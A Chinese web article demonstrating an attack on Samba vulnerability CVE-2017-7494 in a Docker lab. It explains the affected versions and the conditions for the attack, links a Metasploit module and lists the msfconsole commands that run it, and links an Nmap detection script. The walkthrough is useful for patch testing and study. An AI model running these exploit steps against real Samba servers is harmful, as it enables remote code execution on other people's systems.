pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示
阅读排行

服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示


2017/5/27  编辑:admin 来源:本站整理

漏洞信息:

2017年5月24日Samba发布了4.6.4版本, 中间修复了一个严重的远程代码执行漏洞, 漏洞编号CVE-2017-7494, 漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

漏洞利用条件:

1. 服务器打开了文件/打印机共享端口445, 让其能够在公网上访问

2. 共享文件拥有写入权限

3. 恶意攻击者需猜解Samba服务端共享目录的物理路径

满足以上条件时, 由于Samba能够为选定的目录创建网络共享, 当恶意的客户端连接上一个可写的共享目录时, 通过上传恶意的链接库文件, 使服务端程序加载并执行它, 从而实现远程代码执行。 根据服务器的情况, 攻击者还有可能以root身份执

测试环境:

在docker下搭建测试环境

1.拉取镜像到本地

root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1

2.启动环境, 并将虚拟的445端口映射到物理机的445端口上:

root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1

3.在msf下的利用(kali主机IP: 10.0.0.140, 靶机下的ubuntu的物理住机IP:10.0.0.158)

利用的poc:

https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb

将is_known_pipename.rb

拷贝到/usr/share/metasploit-framework/modules/exploits/linux/samba/

服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示复制代码
root@backlion:~# service postgresql startroot@backlion:~# msfconsolemsf > search is_known_pipenamemsf > use exploit/linux/samba/is_known_pipenamemsf exploit(is_known_pipename) > show optionsmsf exploit(is_known_pipename) > set rhost  10.0.0.158msf exploit(is_known_pipename) > set rport  445msf exploit(is_known_pipename) > exploit
服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示复制代码

 服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示

服务器版“永恒之蓝”高危预警 (Samba远程命令执行漏洞CVE-2017-7494) 攻击演示

漏洞检查的NAMP脚本:

http://ys-k.ys168.com/576161633/UIwHtkm3L3K3I865MJ6/samb.nse

相关文章

为什么现在做论坛的都选择香港的服务器多了:MyWebServerv3.6.16绿色版MyWebServer绿色版(小巧的轻量级服务器)运行环境:Win9X/2000/XP/2003/win7/vista|ME/|NT软件语言:简体中文|授权方式:绿色版软件类型:国产软件-源码模版-...。

windows 7下FTP服务器构建教程:首先我们在C盘建立两个文件夹,用于发ftp的上传和下载其次我们找到控制面板>程序>打开或关闭windows功能立即下载搭建ftp服务器软件RumpusPROv8.1.5.3大小:10.36MBFtp工具搭建ftp服务器软件RumpusPRO...。

小果科技为场景金融提供技术服务:场景内金融的风控,难点在于交易数据的把握。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图